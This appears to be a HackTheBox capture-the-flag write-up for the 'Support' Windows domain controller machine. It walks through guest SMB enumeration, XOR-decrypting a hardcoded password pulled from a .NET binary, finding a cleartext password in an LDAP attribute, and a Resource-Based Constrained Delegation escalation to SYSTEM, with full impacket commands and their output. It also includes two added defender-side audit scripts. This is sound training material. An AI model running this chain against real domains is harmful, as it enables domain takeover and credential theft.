Support.
Easy Windows SMB LDAP Reverse Engineering RBCD HackTheBox
Easy-rated Windows AD machine chaining unauthenticated SMB enumeration, static analysis and credential extraction from a .NET binary, LDAP enumeration to find a cleartext password in a user attribute, and a Resource-Based Constrained Delegation (RBCD) attack to escalate to NT AUTHORITY\SYSTEM on the Domain Controller.
User Flag
85cd997117xxxxxxxxxxxxxxxxxxxxxx
Root Flag
9f7027023bxxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance

Full port scan — classic DC profile for support.htb. WinRM on 5985 means a direct shell if we get valid credentials.

nmap
$ nmap -sC -sV -p- 10.129.230.181
PORT     STATE SERVICE
53/tcp   open  dns
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
445/tcp  open  microsoft-ds    ← SMB
389/tcp  open  ldap
636/tcp  open  ldapssl
5985/tcp open  wsman           ← WinRM
9389/tcp open  mc-nmf          ← .NET Message Framing
02 Foothold — SMB Enumeration

Guest authentication is enabled. Enumerate shares — support-tools is non-standard and readable.

SMB — guest auth
$ nxc smb 10.129.230.181 -u 'guest' -p '' --shares
ADMIN$                      Remote Admin
C$                          Default share
IPC$            READ
NETLOGON                    Logon server share
support-tools   READ        ← non-standard
SYSVOL                      Logon server share

$ smbclient //10.129.230.181/support-tools
7-ZipPortable_21.07.paf.exe
npp.8.4.1.portable.x64.zip
putty.exe
SysinternalsSuite.zip
UserInfo.exe.zip            ← custom binary, stands out
windirstat1_1_2_setup.exe
WiresharkPortable64_3.6.5.paf.exe
smb: \> get UserInfo.exe.zip
finding: UserInfo.exe.zip is the only non-vendor custom tool — prime target for analysis.
03 Reversing UserInfo.exe

The binary is a .NET assembly. Decompile with ilspycmd — inside UserInfo.Services.Protected there's an XOR decryption routine with a hardcoded encrypted password and key.

ilspycmd — decompile
$ ilspycmd UserInfo.exe
// UserInfo.Services.Protected
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");

public static string getPassword()
{
    byte[] array = Convert.FromBase64String(enc_password);
    for (int i = 0; i < array.Length; i++)
        array[i] = (byte)((array[i] ^ key[i % key.Length]) ^ 0xDF);
    return Encoding.Default.GetString(array);
}
// LdapQuery() uses: support\\ldap + getPassword()

Replicate the XOR decryption in Python to extract the plaintext password:

decrypt.py
import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

data = base64.b64decode(enc_password)
# same operation as getPassword(): XOR with the repeating key, then with the constant 0xDF
result = bytes([data[i] ^ key[i % len(key)] ^ 0xDF for i in range(len(data))])
print(result.decode())
output
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
creds: ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
04 LDAP Enumeration → WinRM

With the ldap service account, enumerate all user objects looking for non-standard attributes. The support user has their password stored in plaintext in the info field.

ldapsearch
$ ldapsearch -x -H ldap://10.129.230.181 -D "ldap@support.htb" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "(objectClass=user)" info
dn: CN=support,CN=Users,DC=support,DC=htb
info: Ironside47pleasure40Watchful
creds: support : Ironside47pleasure40Watchful — stored in plaintext in the LDAP info attribute.
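An added audit script (not part of the writeup) for the defender's side of this finding: it parses ldapsearch-style LDIF output like the one above and flags free-text attributes whose values look like credentials. The LDIF sample is constructed; the example.user entry and its values are made up, only the support entry reuses what the writeup found.

```python
import re

# Constructed LDIF modelled on the ldapsearch output above; the example.user entry
# is made up, the support entry reuses the value the writeup found.
SAMPLE_LDIF = """\
dn: CN=support,CN=Users,DC=support,DC=htb
info: Ironside47pleasure40Watchful

dn: CN=example.user,CN=Users,DC=support,DC=htb
description: Helpdesk contact
info: ext. 4471
"""

WATCHED = ("info", "description", "comment")   # free-text attributes any domain user can read
KEYWORD = re.compile(r"(?i)\b(pass(word|wd)?|pwd|cred|secret)\b")

def parse_ldif(text):
    """Return [(dn, {attr: [values]})]; folded continuation lines (leading space) are joined."""
    entries, dn, attrs = [], None, {}
    for line in re.sub(r"\n ", "", text).splitlines() + [""]:   # trailing "" flushes last entry
        if not line:
            if dn is not None:
                entries.append((dn, attrs))
            dn, attrs = None, {}
            continue
        name, _, value = line.partition(":")
        if name.lower() == "dn":
            dn = value.strip()
        else:
            attrs.setdefault(name.lower(), []).append(value.strip())
    return entries

def looks_like_credential(value):
    """Heuristic: a password keyword, or one token (no spaces, 8+ chars) mixing 3+ classes."""
    if KEYWORD.search(value):
        return True
    if len(value) < 8 or any(ch.isspace() for ch in value):
        return False
    classes = (r"[a-z]", r"[A-Z]", r"\d", r"[^\w]")
    return sum(bool(re.search(p, value)) for p in classes) >= 3

def find_exposed_credentials(ldif_text):
    """List (dn, attribute, value) for watched attributes whose value looks like a secret."""
    return [(dn, attr, value)
            for dn, attrs in parse_ldif(ldif_text)
            for attr in WATCHED
            for value in attrs.get(attr, [])
            if looks_like_credential(value)]
```

Run it over the output of the same ldapsearch with `description comment` added to the requested attributes; every hit is a value to rotate and remove from the directory.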
evil-winrm → user flag
$ evil-winrm -i 10.129.230.181 -u support -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
85cd997117xxxxxxxxxxxxxxxxxxxxxx
05 Privilege Escalation — RBCD

Run BloodHound to map the attack path. Key finding: the Shared Support Accounts group has GenericAll on DC$. The support user is a member of that group and holds SeMachineAccountPrivilege — enough for a full RBCD attack.

bloodhound-python
$ bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -d support.htb -ns 10.129.230.181 -c All --zip
Shared Support Accounts → GenericAll → DC$
RBCD plan: create fake machine account → write msDS-AllowedToActOnBehalfOfOtherIdentity on DC$ → S4U2Self + S4U2Proxy → ticket as Administrator → SYSTEM shell.

Step 1 — Create a fake machine account

addcomputer
$ impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Password123' -dc-ip 10.129.230.181 'support.htb/support:Ironside47pleasure40Watchful'
[*] Successfully added machine account ATTACKERSYSTEM$ with password Password123.

Step 2 — Configure RBCD on DC$

rbcd
$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -action write 'support.htb/support:Ironside47pleasure40Watchful'
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on DC$ via S4U2Proxy

Step 3 — Request service ticket as Administrator

getST
$ impacket-getST -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.129.230.181 'support.htb/ATTACKERSYSTEM$:Password123'
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

Step 4 — PSExec with the Kerberos ticket

psexec → SYSTEM
$ export KRB5CCNAME='Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache'
$ impacket-psexec -k -no-pass support.htb/Administrator@dc.support.htb
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
9f7027023bxxxxxxxxxxxxxxxxxxxxxx
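The artefact the write in step 2 leaves behind is a binary security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity on DC$. The following is an added defender-side example (not from the writeup or impacket) that parses that descriptor with the stdlib and reports any principal allowed to act on behalf of a domain controller; the sample descriptor, its SID S-1-5-21-1111-2222-3333-4444 and the inventory dict are constructed, and in practice the raw bytes would come from an LDAP query of computer objects.

```python
import struct

# Constructed sample of the self-relative security descriptor an RBCD write leaves in
# msDS-AllowedToActOnBehalfOfOtherIdentity: one ACCESS_ALLOWED ACE for a made-up
# machine-account SID S-1-5-21-1111-2222-3333-4444 (layout per MS-DTYP).
SAMPLE_SD = bytes.fromhex(
    "01000480" "00000000" "00000000" "00000000" "14000000"   # SD header, DACL at +20
    "04002c00" "01000000"                                    # ACL: rev 4, 44 bytes, 1 ACE
    "00002400" "ff010f00"                                    # ACE: ALLOWED, 36 bytes, mask
    "0105000000000005" "15000000" "57040000" "ae080000" "050d0000" "5c110000"  # SID
)

def parse_sid(buf, off):
    """Decode a binary SID at buf[off:] into S-1-... form; return (sid, length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(map(str, subs))), 8 + 4 * count

def allowed_to_act(sd):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    if len(sd) < 20:
        return []
    rev, _, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or dacl_off == 0:   # SE_DACL_PRESENT
        return []
    _, _, _size, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0x00:                 # ACCESS_ALLOWED_ACE: mask at +4, SID at +8
            sids.append(parse_sid(sd, off + 8)[0])
        off += ace_size
    return sids

def delegation_findings(computers, dc_names):
    """Given {sAMAccountName: raw attribute or None}, report every DC that lets any
    principal act on its behalf; RBCD pointing at a DC is always a finding."""
    return [(name, sid) for name, raw in computers.items()
            if name in dc_names and raw for sid in allowed_to_act(raw)]

if __name__ == "__main__":
    # Constructed inventory; real values come from the computer objects in LDAP.
    inventory = {"DC$": SAMPLE_SD, "WS01$": None}
    for name, sid in delegation_findings(inventory, {"DC$"}):
        print("FINDING: %s allows %s to act on its behalf" % (name, sid))
```

Resolving the reported SID back to an account also surfaces the freshly created machine account from step 1, which is the second indicator worth alerting on.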
06 Attack Chain Summary
full chain
Guest SMB → support-tools share
    │
    ▼
UserInfo.exe → XOR decrypt hardcoded password
    │
    ▼
ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
    │
    ▼
LDAP enum → info attribute → plaintext password
    │
    ▼
support : Ironside47pleasure40Watchful
    │
    ▼
WinRM shell → user.txt ✓
    │
    ▼
BloodHound → Shared Support Accounts GenericAll on DC$
    │
    ▼
RBCD: addcomputer → rbcd → getST → psexec
    │
    ▼
NT AUTHORITY\SYSTEM → root.txt ✓
key takeaways:
· Sensitive data in SMB shares — readable shares should never contain internal tooling with hardcoded credentials
· Credentials in LDAP attributes: the info and description fields are readable by any authenticated domain user
· GenericAll on DC$ + SeMachineAccountPrivilege = direct path to domain compromise via RBCD
· RBCD — understanding S4U2Self and S4U2Proxy is essential for both attack and defense